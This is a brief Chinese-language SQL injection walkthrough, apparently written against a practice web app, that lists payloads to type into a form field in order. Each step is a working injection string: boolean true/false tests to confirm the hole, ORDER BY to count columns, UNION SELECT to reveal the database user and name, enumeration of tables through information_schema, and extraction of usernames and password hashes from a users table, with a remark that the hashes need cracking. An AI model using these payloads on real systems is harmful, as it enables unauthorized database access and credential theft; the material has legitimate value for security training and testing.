1、在提交的表单框里输入:
1’ and 1=1#
页面有正常输出
1’ and 1=2#
页面无内容输出
则说明存在SQL注入漏洞;
2、继续在表单框中输入:
1’ order by 1#
页面有正常反应
直到输入: 1’ order by n#
页面有新的跳转,如图,则说明该数据库存在n-1列;
3、继续输入:
1’ union select user(),database()#
页面返回的user对应的内容为当前数据库连接的用户;database对应的内容为当前数据库名称;
4、继续输入:
1’ union select table_name,table_schema from information_schema.tables where table_schema=’数据库名称’#
可以查询到数据库总有哪些数据表;
5、继续输入:
1’ union select user,password from users#
以此来获取user和对应的password;
注:所获得密码为哈希加密后的密码,需要进行解密;